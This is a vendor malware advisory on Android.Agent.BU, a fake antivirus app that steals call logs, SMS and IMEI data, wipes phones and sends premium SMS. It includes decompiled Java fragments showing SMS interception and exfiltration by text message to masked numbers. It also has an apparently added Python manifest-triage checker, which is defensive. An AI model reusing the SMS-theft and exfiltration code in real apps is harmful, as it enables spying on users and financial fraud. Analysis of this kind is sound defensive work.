Thirtyseven4 Antivirus | AntiMalware | AntiRootkit | AntiSpyware

Android.Agent.BU (Mobile Security)

 

 

Name: Android.Agent.BU

Descr. Added: February 10, 2014

Type: Fake AV

Risk: Low

Payload: N/A

At risk systems: Android OS

 

 


 

 

Description:

 

Android.Agent.BU is an Android app developed to trick users into thinking it is a legitimate antivirus application called “Mobile Security”.

Before installation, the application prompts the user for administrator rights and displays two options, ‘Cancel’ and ‘Activate’. Regardless of the option selected, the application installs itself and obtains administrator rights. Once installed with the required administrator rights, the malicious app displays a screen listing a few scanning options.


If one of the options is selected, the app begins performing various malicious activities in the background while presenting what appears to be a virus scan to the end user.

According to analysis by the Thirtyseven4 Viruslab team, Android.Agent.BU is designed to perform the following activities in the background:

1. Stealing the following information from the compromised phone and sending it to the attacker:

    Phone number
    Call type
    Date of call
    Call duration
    Call-list
    Bot_id
    IMEI (International Mobile Station Equipment Identity) number

2. Stealing text messages from the device’s Inbox.

3. Erasing all user data from the compromised phone, including the SD card data.

4. Calling and sending SMS messages to premium numbers without the user’s consent.

Android.Agent.BU contains the following components and requests the following permissions:

Activity:

- com.soft360.iService.MainActivity

- com.BioTechnology.iClientsService.IncomingCallActivity

Service:

- com.soft360.iService.AService

- com.soft360.iService.webService

Receiver:

- com.soft360.iService.Alarm

- com.soft360.iService.AutoStart

- com.soft360.web.MyAdmin

Permission:

- android.permission.READ_PHONE_STATE

- android.permission.ACCESS_WIFI_STATE

- android.permission.CHANGE_WIFI_STATE

- android.permission.READ_PHONE_STATE

- android.permission.CALL_PHONE

- android.permission.ACCESS_NETWORK_STATE

- android.permission.CHANGE_NETWORK_STATE

- android.permission.WRITE_EXTERNAL_STORAGE

- android.permission.ACCESS_NETWORK_STATE

- android.permission.INTERNET

- android.permission.RECEIVE_BOOT_COMPLETED

- android.permission.WRITE_SMS

- android.permission.READ_SMS

- android.permission.RECEIVE_SMS

- android.permission.SEND_SMS

- android.permission.RECEIVE_BOOT_COMPLETED

- android.permission.READ_CONTACTS

- android.permission.RECORD_AUDIO
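A static triage check built from the component names and permissions listed above, as an added example that is not Thirtyseven4's own code: it reads a decoded AndroidManifest.xml (for instance as produced by apktool), reports any of the listed component names, and flags the device-admin-plus-SMS profile even when the package has been renamed. The permission grouping, verdict labels and sample manifest are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET
A = "{http://schemas.android.com/apk/res/android}"  # namespace of android: attributes
# Component names exactly as listed in the write-up above.
IOC_COMPONENTS = {
    "com.soft360.iService.MainActivity", "com.soft360.iService.AService",
    "com.soft360.iService.webService", "com.soft360.iService.Alarm",
    "com.soft360.iService.AutoStart", "com.soft360.web.MyAdmin",
    "com.BioTechnology.iClientsService.IncomingCallActivity",
}
# Assumed grouping of the listed permissions by the behaviour they enable.
RISK_GROUPS = {
    "sms_theft_and_sending": {"READ_SMS", "RECEIVE_SMS", "SEND_SMS"},
    "calls_and_device_id": {"CALL_PHONE", "READ_PHONE_STATE"},
    "autostart_with_network": {"RECEIVE_BOOT_COMPLETED", "INTERNET"},
}

def triage_manifest(xml_text):
    """Triage a decoded AndroidManifest.xml taken from an untrusted APK."""
    if "<!DOCTYPE" in xml_text or "<!ENTITY" in xml_text:
        raise ValueError("DTD in manifest, refusing to parse")  # entity-expansion guard
    root = ET.fromstring(xml_text)
    pkg = root.get("package", "")
    perms = {e.get(A + "name", "").rsplit(".", 1)[-1] for e in root.iter("uses-permission")}
    components, device_admin = set(), False
    for tag in ("activity", "service", "receiver"):
        for e in root.iter(tag):
            name = e.get(A + "name", "")
            if "." not in name or name.startswith("."):  # relative class name
                name = pkg + "." + name.lstrip(".")
            components.add(name)
            # A device-admin receiver is declared with BIND_DEVICE_ADMIN.
            if e.get(A + "permission") == "android.permission.BIND_DEVICE_ADMIN":
                device_admin = True
    hits = sorted(components & IOC_COMPONENTS)
    groups = sorted(g for g, need in RISK_GROUPS.items() if need <= perms)
    verdict = ("known-component-match" if hits else
               "suspicious-profile" if device_admin and "sms_theft_and_sending" in groups
               else "no-match")
    return {"verdict": verdict, "ioc_components": hits,
            "risk_groups": groups, "device_admin": device_admin}

# Constructed sample manifest, not extracted from the real APK.
PERM_TAG = '<uses-permission android:name="android.permission.%s"/>'
SAMPLE = ('<manifest xmlns:android="http://schemas.android.com/apk/res/android"'
          ' package="com.soft360.iService">'
          + "".join(PERM_TAG % p for p in ("READ_SMS", "RECEIVE_SMS", "SEND_SMS", "INTERNET"))
          + '<application><activity android:name=".MainActivity"/>'
          '<receiver android:name="com.soft360.web.MyAdmin"'
          ' android:permission="android.permission.BIND_DEVICE_ADMIN"/></application></manifest>')
```

Calling `triage_manifest(SAMPLE)` returns the verdict together with the matched component names, the permission groups that are fully present, and whether a device-admin receiver is declared.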

Code Snippet:

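// Build an intent for the SMS_RECEIVED action and direct it at the app's own SmsReciever class.
String str1 = "android.provider.Telephony.SMS_RECEIVED";
Intent localIntent1 = new Intent(str1);
MainActivity localMainActivity1 = this;
Class<SmsReciever> localSmsReciever = SmsReciever.class;
Intent localIntent2 = localIntent1.setClass(localMainActivity1, localSmsReciever);
// Broadcast the intent so SmsReciever handles it.
sendBroadcast(localIntent1);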

In SmsReciever:

1) String str2 = localSmsMessage1.getDisplayMessageBody().toString();

str2 contains the body of the received message.

String str3 = localSmsMessage1.getOriginatingAddress().trim();

str3 contains the number the message was received from.

2) The following code locates numbers from the call list of the phone.

if (localsmsParser.isCallList())
{
    localdbActions.sent_Call_Details();
    continue;
}

Note: the SMSReceiver class checks for “79********54” SMS.

3) The SMS receiver class calls the dbAction class.

The following methods in the dbAction class perform the malicious activity:

a) sent_Call_Details():
b) get_sms_list():
c) getIMEI():
e) setCALL(int paramInt)
f) setSMS(int paramInt)

In WebService Root class:

1) initDeviceServ() is called from the Alarm class.

Here it checks whether the SMS count (send_sms_count) is greater than one.

if (this.send_sms_count > 1);
try
{

- Str1 = i am

- localStringBuilder1 = i am (

- Str2 = Sim Number

- localStringBuilder2 = Sim Number (

- Str3 = Device Name

- Str4 = Device Name )

- Str5 = phone number (79*******45)

It sends all the information to 79*******45.

localSmsManager.sendTextMessage(str5, null, str4, null, null);



Destination Number:

+44********30 is one of the numbers where all the stolen user data is sent.

<string name="def_tel_number">+44********30</string>

Thirtyseven4 customers are fully protected against Android.Agent.BU
